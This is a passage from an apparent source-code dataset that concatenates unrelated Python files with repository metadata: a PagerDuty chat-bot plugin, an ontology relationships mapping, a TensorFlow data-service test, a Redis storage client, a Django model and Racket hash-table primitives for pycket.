self.reply("%s has been already resolved." % i, color="yellow")
continue
elif action == 'reassign':
try:
if assign_to_email is not None:
assign_to = self._associate_pd_user(assign_to_email, pager)
if assign_to is None:
self.reply("Coudn't find the PD user for %s :(" % assign_to_email)
return
else:
incident.reassign(user_ids=[assign_to.id], requester_id=user.id)
except pygerduty.BadRequest:
                            # ignore any error; it might be worth logging it
                            # somewhere in the future
continue
self.reply("Ok.")
# if incident(s) are not given
else:
try:
# acknowledge assigned incidents
if action == 'ack':
for incident in pager.incidents.list(status='triggered', assigned_to=user):
incident.acknowledge(requester_id=user.id)
                # acknowledge all incidents
elif action == 'ack_all':
for incident in pager.incidents.list(status='triggered'):
incident.acknowledge(requester_id=user.id)
# resolve assigned incidents
elif action == 'resolve':
for incident in pager.incidents.list(status='acknowledged', assigned_to=user):
incident.resolve(requester_id=user.id)
# resolve all incidents
elif action == 'resolve_all':
for incident in pager.incidents.list(status='acknowledged'):
incident.resolve(requester_id=user.id)
self.reply("Ok.")
except pygerduty.BadRequest:
# ignore any error, might be acked/resolved
pass
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd ack$")
def ack_all_assigned_incidents(self, message):
self._update_incident(message, None, 'ack')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd ack (?P<incidents>[0-9 ]*)")
def ack_incidents(self, message, incidents):
self._update_incident(message, incidents.split(" "), 'ack')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd ack!$")
def ack_all_incidents(self, message):
self._update_incident(message, None, 'ack_all')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd resolve$")
def resolve_all_assigned_and_acknowledged_incidents(self, message):
self._update_incident(message, None, 'resolve')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd resolve (?P<incidents>[0-9 ]*)")
    def resolve_incidents(self, message, incidents):
self._update_incident(message, incidents.split(" "), 'resolve')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to("^pd resolve!$")
def resolve_all_incidents(self, message):
self._update_incident(message, None, 'resolve_all')
@require_settings("PAGERDUTY_SUBDOMAIN", "PAGERDUTY_API_KEY")
@respond_to(r"^pd maintenance (?P<service_name>[\S+ ]+) (?P<interval>[1-9])h$")
def set_service_maintenance(self, message, service_name=None, interval=None):
if not interval:
interval = 1
pager = pygerduty.PagerDuty(settings.PAGERDUTY_SUBDOMAIN, settings.PAGERDUTY_API_KEY)
for service in pager.services.list(limit=50):
if service.name == service_name:
user = self._associate_pd_user(self.get_user(message.sender['hipchat_id'])['email'], pager)
if user is None:
self.reply("I couldn't find your user :(", color="yellow")
return
now = datetime.datetime.utcnow()
start_time = now.strftime("%Y-%m-%dT%H:%MZ")
end_time = (now + datetime.timedelta(hours=int(interval))).strftime("%Y-%m-%dT%H:%MZ")
try:
pager.maintenance_windows.create(service_ids=[service.id], requester_id=user.id,
start_time=start_time,
end_time=end_time)
self.reply("Ok.")
except pygerduty.BadRequest as e:
self.reply("Failed: %s" % e.message, color="yellow")
@respond_to("^pd reassign (?P<incidents>[0-9 ]+)( )(?P<mention_name>[a-zA-Z@]+)$")
def reassign_incidents(self, message, incidents, mention_name):
email_address = self._get_user_email_from_mention_name(mention_name)
if email_address:
self._update_incident(message, incidents.split(" "), 'reassign', email_address)
else:
self.reply("Can't find email address for %s" % mention_name)
|
bedb88273850159a19fa815ba794be82e9019739
|
bade5b29e8ba58adbe440f8eda491e43b2155132
|
/pronto/entity/attributes.py
|
1f7f8ac069c52f64c7dd5877d15dec10a30bf393
|
[
"MIT"
] |
permissive
|
althonos/pronto
|
72697bd0aa0e69b728d70038d340b546de2d5b76
|
9e11c06e71c24685404fc1d0d3a560f4e2cdd3de
|
refs/heads/master
| 2023-08-20T19:46:30.418518
| 2023-08-17T10:27:39
| 2023-08-17T10:27:39
| 62,424,052
| 228
| 60
|
MIT
| 2023-09-04T04:39:11
| 2016-07-01T23:02:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,529
|
py
|
attributes.py
|
import typing
from typing import Iterable, Iterator
from ..utils.meta import typechecked
from . import Entity, EntitySet
if typing.TYPE_CHECKING:
from ..relationship import Relationship
_E = typing.TypeVar("_E", bound=Entity)
_S = typing.TypeVar("_S", bound=EntitySet)
class Relationships(typing.MutableMapping["Relationship", _S], typing.Generic[_E, _S]):
"""A dedicated mutable mapping to manage the relationships of an entity."""
def __init__(self, entity: _E):
self._inner = entity._data().relationships
self._entity = entity
self._ontology = entity._ontology()
def __getitem__(self, item: "Relationship") -> _S:
if item.id not in self._inner:
raise KeyError(item)
s = self._entity._Set()
s._ids = self._inner[item.id]
s._ontology = self._ontology
return s
def __delitem__(self, item: "Relationship"):
if item.id not in self._inner:
raise KeyError(item)
del self._inner[item.id]
def __len__(self) -> int:
return len(self._inner)
def __iter__(self) -> Iterator["Relationship"]:
from ..relationship import Relationship
return (self._ontology.get_relationship(id_) for id_ in self._inner)
def __setitem__(self, key: "Relationship", entities: Iterable[_E]):
if key._ontology() is not self._ontology:
raise ValueError("cannot use a relationship from a different ontology")
self._inner[key.id] = {entity.id for entity in entities}
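# Usage sketch (hypothetical `part_of` relationship and terms from the same ontology):
#
#   term.relationships[part_of] = [other_term]   # __setitem__ stores the entity ids
#   parts = term.relationships[part_of]          # __getitem__ returns an EntitySet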
|
6d5d1e637d6fd03aad2240d9b5cf0a80d313c209
|
4bcc9806152542ab43fc2cf47c499424f200896c
|
/tensorflow/python/data/experimental/kernel_tests/service/metadata_test.py
|
750b405079c788eedb4ca9df4736ba002609b6ae
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
tensorflow/tensorflow
|
906276dbafcc70a941026aa5dc50425ef71ee282
|
a7f3934a67900720af3d3b15389551483bee50b8
|
refs/heads/master
| 2023-08-25T04:24:41.611870
| 2023-08-25T04:06:24
| 2023-08-25T04:14:08
| 45,717,250
| 208,740
| 109,943
|
Apache-2.0
| 2023-09-14T20:55:50
| 2015-11-07T01:19:20
|
C++
|
UTF-8
|
Python
| false
| false
| 10,418
|
py
|
metadata_test.py
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service metadata."""
import functools
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests.service import test_base as data_service_test_base
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.experimental.ops import distribute
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import test
def _cardinality_test_combinations():
"""Generate test combinations for data service cardinality tests.
We test only V2 combinations for the infinite and 0 cases because the `map`
transformation for compression makes the cardinality unknown in TF1.
Returns:
test combinations.
"""
def _reduce_cases_to_combinations(result, case):
name, dataset_fn, sharding_policy, expected_result = case
return result + combinations.combine(
dataset_fn=combinations.NamedObject(name, dataset_fn),
sharding_policy=sharding_policy,
expected_result=expected_result)
def _cases_to_combinations(cases):
return functools.reduce(_reduce_cases_to_combinations, cases, [])
def _infinite_dataset_with_hint_shard():
return (dataset_ops.Dataset.range(10).shard(distribute.SHARD_HINT,
distribute.SHARD_HINT).repeat())
def _empty_dataset_with_hint_shard():
return (dataset_ops.Dataset.range(0).shard(distribute.SHARD_HINT,
distribute.SHARD_HINT))
v2_only_cases = [
("NoShardingInfinite", lambda: dataset_ops.Dataset.range(10).repeat(),
data_service_ops.ShardingPolicy.OFF, dataset_ops.INFINITE),
("DynamicShardingInfinite", lambda: dataset_ops.Dataset.range(5).repeat(),
data_service_ops.ShardingPolicy.DYNAMIC, dataset_ops.INFINITE),
("DataShardingInfinite", lambda: dataset_ops.Dataset.range(10).repeat(),
data_service_ops.ShardingPolicy.DATA, dataset_ops.INFINITE),
("NoShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.OFF, 0),
("DynamicShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.DYNAMIC, 0),
("DataShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.DATA, 0),
("FileOrDataShardingZero", lambda: dataset_ops.Dataset.range(0),
data_service_ops.ShardingPolicy.FILE_OR_DATA, 0),
("HintShardingZero", _empty_dataset_with_hint_shard,
data_service_ops.ShardingPolicy.HINT, dataset_ops.UNKNOWN),
]
v1_and_v2_cases = [
("Finite", lambda: dataset_ops.Dataset.range(10),
data_service_ops.ShardingPolicy.OFF, dataset_ops.UNKNOWN),
("FileOrDataShardingUnknown",
lambda: dataset_ops.Dataset.range(10).repeat(),
data_service_ops.ShardingPolicy.FILE_OR_DATA, dataset_ops.UNKNOWN),
("HintShardingUnknown", _infinite_dataset_with_hint_shard,
data_service_ops.ShardingPolicy.HINT, dataset_ops.UNKNOWN),
]
v2_only_combinations = combinations.times(
combinations.combine(tf_api_version=2, mode=["eager", "graph"]),
_cases_to_combinations(v2_only_cases))
v1_and_v2_combinations = combinations.times(
combinations.combine(tf_api_version=[1, 2], mode=["eager", "graph"]),
_cases_to_combinations(v1_and_v2_cases))
return v2_only_combinations + v1_and_v2_combinations
class DataServiceMetadataTest(data_service_test_base.TestBase,
parameterized.TestCase):
"""Tests propagating data service metadata through tf.data service."""
@combinations.generate(_cardinality_test_combinations())
def testCardinality(self, dataset_fn, sharding_policy, expected_result):
cluster = data_service_test_base.TestCluster(num_workers=2)
dataset = dataset_fn()
dataset = self.make_distributed_dataset(
dataset, cluster=cluster, processing_mode=sharding_policy)
self.assertEqual(self.evaluate(dataset.cardinality()), expected_result)
@combinations.generate(_cardinality_test_combinations())
def testFromDatasetIdCardinality(self, dataset_fn, sharding_policy,
expected_result):
cluster = data_service_test_base.TestCluster(num_workers=2)
dataset = dataset_fn()
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset=dataset)
dataset = data_service_ops.from_dataset_id(
processing_mode=sharding_policy,
service=cluster.dispatcher.target,
dataset_id=dataset_id,
element_spec=dataset.element_spec)
self.assertEqual(self.evaluate(dataset.cardinality()), expected_result)
@combinations.generate(test_base.eager_only_combinations())
def testFromDatasetIdDoesntRequireElementSpec(self):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=data_service_test_base.NO_WORK_DIR,
fault_tolerant_mode=False,
data_transfer_protocol="grpc")
num_elements = 10
dataset = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(cluster.dispatcher_address(),
dataset)
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher_address(),
dataset_id=dataset_id)
self.assertDatasetProduces(dataset, list(range(num_elements)))
@combinations.generate(test_base.graph_only_combinations())
def testElementSpecGraphMode(self):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=data_service_test_base.NO_WORK_DIR,
fault_tolerant_mode=False)
num_elements = 10
dataset = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(cluster.dispatcher_address(),
dataset)
with self.assertRaisesRegex(
ValueError, "In graph mode `element_spec` must be provided manually."):
_ = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher_address(),
dataset_id=dataset_id)
@combinations.generate(test_base.eager_only_combinations())
def testElementSpecMixedMode(self):
cluster = data_service_test_base.TestCluster(
num_workers=1,
work_dir=data_service_test_base.NO_WORK_DIR,
fault_tolerant_mode=False)
num_elements = 10
dataset = dataset_ops.Dataset.range(num_elements)
@def_function.function
def get_dataset_id():
return data_service_ops.register_dataset(cluster.dispatcher_address(),
dataset)
dataset_id = get_dataset_id()
dataset_id_val = tensor_util.constant_value(dataset_id)
with self.assertRaisesRegex(
ValueError,
f"Failed to fetch element spec for dataset id {dataset_id_val} from "
"tf.data service. If the dataset was registered in graph mode or "
"inside a tf.function, the `element_spec` must be specified as an "
"argument to `from_dataset_id`."):
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher_address(),
dataset_id=dataset_id)
@combinations.generate(
combinations.times(test_base.default_test_combinations(),
combinations.combine(compression=[None, "AUTO"])))
def testFromDatasetIdOmitsCompression(self, compression):
cluster = data_service_test_base.TestCluster(
num_workers=1, data_transfer_protocol="grpc")
dataset = dataset_ops.Dataset.from_tensor_slices(
list("abcdefghijklmnopqrstuvwxyz"))
def to_upper(x):
return script_ops.numpy_function(
func=lambda x: x.decode("utf-8").upper(), inp=[x], Tout=dtypes.string)
dataset = dataset.map(to_upper, num_parallel_calls=dataset_ops.AUTOTUNE)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset=dataset, compression=compression)
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
dataset_id=dataset_id,
element_spec=dataset.element_spec)
self.assertDatasetProduces(dataset, list("ABCDEFGHIJKLMNOPQRSTUVWXYZ"))
# Eager-only as querying `element_spec` is only supported in the eager mode.
@combinations.generate(
combinations.times(test_base.eager_only_combinations(),
combinations.combine(compression=[None, "AUTO"])))
def testFromDatasetIdOmitsElementSpecAndCompression(self, compression):
cluster = data_service_test_base.TestCluster(
num_workers=1, data_transfer_protocol="grpc")
dataset = dataset_ops.Dataset.from_tensor_slices(
list("ABCDEFGHIJKLMNOPQRSTUVWXYZ"))
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset=dataset, compression=compression)
dataset = data_service_ops.from_dataset_id(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
dataset_id=dataset_id)
self.assertDatasetProduces(dataset, list("ABCDEFGHIJKLMNOPQRSTUVWXYZ"))
if __name__ == "__main__":
test.main()
| repo: deephyper/deephyper | path: /deephyper/evaluator/storage/_redis_storage.py | license: BSD-3-Clause (permissive) | Python | 8,727 bytes |
import pickle
from typing import Any, Dict, Hashable, List, Tuple
import redis
from deephyper.evaluator.storage._storage import Storage
class RedisStorage(Storage):
"""Storage client for Redis.
The Redis server should be started with the Redis-JSON module loaded.
Args:
host (str, optional): The host of the Redis server. Defaults to "localhost".
port (int, optional): The port of the Redis server. Defaults to 6379.
db (int, optional): The database of the Redis server. Defaults to 0.
"""
def __init__(self, host="localhost", port=6379, db=0) -> None:
super().__init__()
self._host = host
self._port = port
self._db = db
self._redis = None
def _connect(self):
self._redis = redis.Redis(
host=self._host,
port=self._port,
db=self._db,
charset="utf-8",
decode_responses=True,
)
self.connected = True
self._redis.setnx("search_id_counter", 0)
def __getstate__(self):
state = {
"_host": self._host,
"_port": self._port,
"_db": self._db,
"_redis": None,
"connected": False,
}
return state
def __setstate__(self, newstate):
self.__dict__.update(newstate)
self.connect()
def create_new_search(self) -> Hashable:
"""Create a new search in the store and returns its identifier.
Returns:
Hashable: The identifier of the search.
"""
search_id_counter = self._redis.incr("search_id_counter", amount=1) - 1
search_id = f"{search_id_counter}" # converting to str
self._redis.rpush("search_id_list", search_id)
return search_id
def create_new_job(self, search_id: Hashable) -> Hashable:
"""Creates a new job in the store and returns its identifier.
Args:
search_id (Hashable): The identifier of the search in which a new job
is created.
Returns:
Hashable: The created identifier of the job.
"""
partial_id = (
self._redis.incr(f"search:{search_id}.job_id_counter", amount=1) - 1
)
partial_id = f"{partial_id}" # converting to str
job_id = f"{search_id}.{partial_id}"
self._redis.rpush(f"search:{search_id}.job_id_list", job_id)
self._redis.json().set(
f"job:{job_id}", ".", {"in": None, "metadata": {}, "out": None}
)
return job_id
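    # Key-layout sketch (illustrative): after one search with one job, the
    # Redis keyspace produced by the methods above looks roughly like
    #   search_id_counter        -> 1
    #   search_id_list           -> ["0"]
    #   search:0.job_id_counter  -> 1
    #   search:0.job_id_list     -> ["0.0"]
    #   job:0.0                  -> {"in": None, "metadata": {}, "out": None}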
def store_job(self, job_id: Hashable, key: Hashable, value: Any) -> None:
"""Stores the value corresponding to key for job_id.
Args:
job_id (Hashable): The identifier of the job.
key (Hashable): A key to use to store the value.
value (Any): The value to store.
"""
self._redis.json().set(f"job:{job_id}", f".{key}", value)
def store_job_in(
self, job_id: Hashable, args: Tuple = None, kwargs: Dict = None
) -> None:
"""Stores the input arguments of the executed job.
Args:
job_id (Hashable): The identifier of the job.
args (Optional[Tuple], optional): The positional arguments. Defaults to None.
kwargs (Optional[Dict], optional): The keyword arguments. Defaults to None.
"""
self.store_job(job_id, key="in", value={"args": args, "kwargs": kwargs})
def store_job_out(self, job_id: Hashable, value: Any) -> None:
"""Stores the output value of the executed job.
Args:
job_id (Hashable): The identifier of the job.
value (Any): The value to store.
"""
self.store_job(job_id, key="out", value=value)
def store_job_metadata(self, job_id: Hashable, key: Hashable, value: Any) -> None:
"""Stores other metadata related to the execution of the job.
Args:
job_id (Hashable): The identifier of the job.
key (Hashable): A key to use to store the metadata of the given job.
value (Any): The value to store.
"""
self._redis.json().set(f"job:{job_id}", f".metadata.{key}", value)
def load_all_search_ids(self) -> List[Hashable]:
"""Loads the identifiers of all recorded searches.
Returns:
List[Hashable]: A list of identifiers of all the recorded searches.
"""
search_ids = self._redis.lrange("search_id_list", 0, -1)
return search_ids
def load_all_job_ids(self, search_id: Hashable) -> List[Hashable]:
"""Loads the identifiers of all recorded jobs in the search.
Args:
search_id (Hashable): The identifier of the search.
Returns:
List[Hashable]: A list of identifiers of all the jobs.
"""
job_ids = self._redis.lrange(f"search:{search_id}.job_id_list", 0, -1)
return job_ids
def load_search(self, search_id: Hashable) -> dict:
"""Loads the data of a search.
Args:
search_id (Hashable): The identifier of the search.
Returns:
dict: The corresponding data of the search.
"""
job_ids = self.load_all_job_ids(search_id)
with self._redis.pipeline() as pipe:
for job_id in job_ids:
pipe.json().get(f"job:{job_id}", ".")
data = pipe.execute()
for i, job_id in enumerate(job_ids):
data[i]["job_id"] = job_id
return data
def load_job(self, job_id: Hashable) -> dict:
"""Loads the data of a job.
Args:
job_id (Hashable): The identifier of the job.
Returns:
dict: The corresponding data of the job.
"""
data = self._redis.json().get(f"job:{job_id}", ".")
return data
def store_search_value(
self, search_id: Hashable, key: Hashable, value: Any
) -> None:
"""Stores the value corresponding to key for search_id.
Args:
search_id (Hashable): The identifier of the job.
key (Hashable): A key to use to store the value.
value (Any): The value to store.
"""
key = f"{search_id}.{key}"
value = pickle.dumps(value)
self._redis.set(key, value)
def load_search_value(self, search_id: Hashable, key: Hashable) -> Any:
"""Loads the value corresponding to key for search_id.
Args:
search_id (Hashable): The identifier of the job.
key (Hashable): A key to use to access the value.
"""
key = f"{search_id}.{key}"
value = self._redis.get(key)
value = pickle.loads(value)
return value
def load_metadata_from_all_jobs(
self, search_id: Hashable, key: Hashable
) -> List[Any]:
"""Loads a given metadata value from all jobs.
Args:
search_id (Hashable): The identifier of the search.
key (Hashable): The identifier of the value.
Returns:
List[Any]: A list of all the retrieved metadata values.
"""
jobs_ids = self.load_all_job_ids(search_id)
values = []
for job_id in jobs_ids:
try:
value = self._redis.json().get(f"job:{job_id}", f".metadata.{key}")
except redis.exceptions.ResponseError:
value = None
if value is not None:
values.append(value)
return values
def load_out_from_all_jobs(self, search_id: Hashable) -> List[Any]:
"""Loads the output value from all jobs.
Args:
search_id (Hashable): The identifier of the search.
Returns:
List[Any]: A list of all the retrieved output values.
"""
jobs_ids = self.load_all_job_ids(search_id)
values = []
for job_id in jobs_ids:
try:
value = self._redis.json().get(f"job:{job_id}", ".out")
except redis.exceptions.ResponseError:
value = None
if value is not None:
values.append(value)
return values
def load_jobs(self, job_ids: List[Hashable]) -> dict:
"""Load all data from a given list of jobs' identifiers.
Args:
job_ids (list): The list of job identifiers.
Returns:
            dict: A dictionary of the retrieved values where the keys are the identifiers of jobs.
"""
redis_job_ids = map(lambda jid: f"job:{jid}", job_ids)
data = self._redis.json().mget(redis_job_ids, ".")
data = {k: v for k, v in zip(job_ids, data)}
return data
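if __name__ == "__main__":
    # Minimal usage sketch, assuming a local Redis server with the RedisJSON
    # module loaded; `connect()` is assumed to be provided by the `Storage`
    # base class (it is what `__setstate__` above relies on).
    storage = RedisStorage(host="localhost", port=6379, db=0)
    storage.connect()
    search_id = storage.create_new_search()
    job_id = storage.create_new_job(search_id)
    storage.store_job_in(job_id, args=(), kwargs={"x": 1.0})
    storage.store_job_out(job_id, 0.42)
    print(storage.load_job(job_id))  # {'in': ..., 'metadata': {}, 'out': 0.42}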
| repo: fedspendingtransparency/usaspending-api | path: /usaspending_api/references/models/subtier_agency.py | license: CC0-1.0 (permissive) | Python | 456 bytes |
from django.db import models
class SubtierAgency(models.Model):
subtier_agency_id = models.AutoField(primary_key=True)
create_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
subtier_code = models.TextField(db_index=True, unique=True)
abbreviation = models.TextField(blank=True, null=True)
name = models.TextField(db_index=True)
class Meta:
db_table = "subtier_agency"
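# Illustrative ORM usage (a sketch, not part of the model file): because
# `subtier_code` is unique and indexed, lookups such as
#   SubtierAgency.objects.get(subtier_code="1234")
# hit the unique index, and the index on `name` supports filters like
#   SubtierAgency.objects.filter(name__startswith="Office of")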
| repo: pycket/pycket | path: /pycket/prims/hash.py | license: MIT (permissive) | Python | 15,974 bytes |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from pycket import impersonators as imp
from pycket import values, values_string
from pycket.hash.base import W_HashTable, W_ImmutableHashTable, w_missing
from pycket.hash.simple import (
W_EqvMutableHashTable, W_EqMutableHashTable,
W_EqvImmutableHashTable, W_EqImmutableHashTable,
make_simple_mutable_table, make_simple_mutable_table_assocs,
make_simple_immutable_table, make_simple_immutable_table_assocs)
from pycket.hash.equal import W_EqualHashTable
from pycket.impersonators.baseline import W_ImpHashTable, W_ChpHashTable
from pycket.cont import continuation, loop_label
from pycket.error import SchemeException
from pycket.prims.expose import default, expose, procedure, define_nyi
from rpython.rlib import jit, objectmodel
_KEY = 0
_VALUE = 1
_KEY_AND_VALUE = 2
_PAIR = 3
PREFIXES = ["unsafe-mutable", "unsafe-immutable"]
def prefix_hash_names(base):
result = [base]
for pre in PREFIXES:
result.append("%s-%s" % (pre, base))
return result
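# For example, prefix_hash_names("hash-iterate-first") returns
#   ["hash-iterate-first",
#    "unsafe-mutable-hash-iterate-first",
#    "unsafe-immutable-hash-iterate-first"]
# so each iteration primitive below is exposed under all three names.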
@expose(prefix_hash_names("hash-iterate-first"), [W_HashTable])
def hash_iterate_first(ht):
if ht.length() == 0:
return values.w_false
return values.W_Fixnum.ZERO
@expose(prefix_hash_names("hash-iterate-next"), [W_HashTable, values.W_Fixnum])
def hash_iterate_next(ht, pos):
return ht.hash_iterate_next(pos)
@objectmodel.specialize.arg(4)
def hash_iter_ref(ht, n, env, cont, returns):
from pycket.interpreter import return_value, return_multi_vals
try:
w_key, w_val = ht.get_item(n)
if returns == _KEY:
return return_value(w_key, env, cont)
if returns == _VALUE:
return return_value(w_val, env, cont)
if returns == _KEY_AND_VALUE:
vals = values.Values._make2(w_key, w_val)
return return_multi_vals(vals, env, cont)
if returns == _PAIR:
vals = values.W_Cons.make(w_key, w_val)
return return_value(vals, env, cont)
assert False, "unknown return code"
except KeyError:
raise SchemeException("hash-iterate-key: invalid position")
except IndexError:
raise SchemeException("hash-iterate-key: invalid position")
@expose(prefix_hash_names("hash-iterate-key"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_key(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_KEY)
@expose(prefix_hash_names("hash-iterate-value"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_value(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_VALUE)
@expose(prefix_hash_names("hash-iterate-key+value"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_key_value(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_KEY_AND_VALUE)
@expose(prefix_hash_names("hash-iterate-pair"),
[W_HashTable, values.W_Fixnum], simple=False)
def hash_iterate_pair(ht, pos, env, cont):
return hash_iter_ref(ht, pos.value, env, cont, returns=_PAIR)
@expose("hash-for-each", [W_HashTable, procedure, default(values.W_Object, values.w_false)], simple=False)
def hash_for_each(ht, f, try_order, env, cont):
    # FIXME: implement try-order? -- see hash-map
return hash_for_each_loop(ht, f, 0, env, cont)
@loop_label
def hash_for_each_loop(ht, f, index, env, cont):
from pycket.interpreter import return_value
try:
w_key, w_value = ht.get_item(index)
except KeyError:
return hash_for_each_loop(ht, f, index + 1, env, cont)
except IndexError:
return return_value(values.w_void, env, cont)
return f.call([w_key, w_value], env,
hash_for_each_cont(ht, f, index, env, cont))
@continuation
def hash_for_each_cont(ht, f, index, env, cont, _vals):
return hash_for_each_loop(ht, f, index + 1, env, cont)
@expose("hash-map", [W_HashTable, procedure, default(values.W_Object, values.w_false)], simple=False)
def hash_map(h, f, try_order, env, cont):
# FIXME : If try-order? is true, then the order of keys and values
# passed to proc is normalized under certain circumstances, such
# as when the keys are all symbols and hash is not an
# impersonator.
from pycket.interpreter import return_value
acc = values.w_null
return hash_map_loop(f, h, 0, acc, env, cont)
# f.enable_jitting()
# return return_value(w_missing, env,
# hash_map_cont(f, h, 0, acc, env, cont))
@loop_label
def hash_map_loop(f, ht, index, w_acc, env, cont):
from pycket.interpreter import return_value
try:
w_key, w_value = ht.get_item(index)
except KeyError:
return hash_map_loop(f, ht, index + 1, w_acc, env, cont)
except IndexError:
return return_value(w_acc, env, cont)
after = hash_map_cont(f, ht, index, w_acc, env, cont)
return f.call([w_key, w_value], env, after)
@continuation
def hash_map_cont(f, ht, index, w_acc, env, cont, _vals):
from pycket.interpreter import check_one_val
w_val = check_one_val(_vals)
w_acc = values.W_Cons.make(w_val, w_acc)
return hash_map_loop(f, ht, index + 1, w_acc, env, cont)
@jit.elidable
def from_assocs(assocs, fname):
if not assocs.is_proper_list():
raise SchemeException("%s: expected proper list" % fname)
keys = []
vals = []
while isinstance(assocs, values.W_Cons):
val, assocs = assocs.car(), assocs.cdr()
if not isinstance(val, values.W_Cons):
raise SchemeException("%s: expected list of pairs" % fname)
keys.append(val.car())
vals.append(val.cdr())
return keys[:], vals[:]
@expose("make-weak-hasheq", [default(values.W_List, values.w_null)])
def make_weak_hasheq(assocs):
# FIXME: not actually weak
return make_simple_mutable_table_assocs(W_EqMutableHashTable, assocs, "make-weak-hasheq")
@expose("make-weak-hasheqv", [default(values.W_List, values.w_null)])
def make_weak_hasheqv(assocs):
# FIXME: not actually weak
return make_simple_mutable_table_assocs(W_EqvMutableHashTable, assocs, "make-weak-hasheqv")
@expose(["make-weak-hash", "make-late-weak-hasheq"], [default(values.W_List, None)])
def make_weak_hash(assocs):
if assocs is None:
return W_EqualHashTable([], [], immutable=False)
return W_EqualHashTable(*from_assocs(assocs, "make-weak-hash"), immutable=False)
@expose("make-immutable-hash", [default(values.W_List, values.w_null)])
def make_immutable_hash(assocs):
keys, vals = from_assocs(assocs, "make-immutable-hash")
return W_EqualHashTable(keys, vals, immutable=True)
@expose("make-immutable-hasheq", [default(values.W_List, values.w_null)])
def make_immutable_hasheq(assocs):
return make_simple_immutable_table_assocs(W_EqImmutableHashTable, assocs, "make-immutable-hasheq")
@expose("make-immutable-hasheqv", [default(values.W_List, values.w_null)])
def make_immutable_hasheqv(assocs):
    return make_simple_immutable_table_assocs(W_EqvImmutableHashTable, assocs, "make-immutable-hasheqv")
@expose("hash")
def hash(args):
if len(args) % 2 != 0:
raise SchemeException("hash: key does not have a corresponding value")
keys = [args[i] for i in range(0, len(args), 2)]
vals = [args[i] for i in range(1, len(args), 2)]
return W_EqualHashTable(keys, vals, immutable=True)
@expose("hasheq")
def hasheq(args):
if len(args) % 2 != 0:
raise SchemeException("hasheq: key does not have a corresponding value")
keys = [args[i] for i in range(0, len(args), 2)]
vals = [args[i] for i in range(1, len(args), 2)]
return make_simple_immutable_table(W_EqImmutableHashTable, keys, vals)
@expose("hasheqv")
def hasheqv(args):
if len(args) % 2 != 0:
raise SchemeException("hasheqv: key does not have a corresponding value")
keys = [args[i] for i in range(0, len(args), 2)]
vals = [args[i] for i in range(1, len(args), 2)]
return make_simple_immutable_table(W_EqvImmutableHashTable, keys, vals)
@expose("make-hash", [default(values.W_List, values.w_null)])
def make_hash(pairs):
return W_EqualHashTable(*from_assocs(pairs, "make-hash"))
@expose("make-hasheq", [default(values.W_List, values.w_null)])
def make_hasheq(pairs):
return make_simple_mutable_table_assocs(W_EqMutableHashTable, pairs, "make-hasheq")
@expose("make-hasheqv", [default(values.W_List, values.w_null)])
def make_hasheqv(pairs):
return make_simple_mutable_table_assocs(W_EqvMutableHashTable, pairs, "make-hasheqv")
@expose("hash-set!", [W_HashTable, values.W_Object, values.W_Object], simple=False)
def hash_set_bang(ht, k, v, env, cont):
if ht.immutable():
raise SchemeException("hash-set!: given immutable table")
return ht.hash_set(k, v, env, cont)
@continuation
def hash_set_cont(key, val, env, cont, _vals):
from pycket.interpreter import check_one_val
table = check_one_val(_vals)
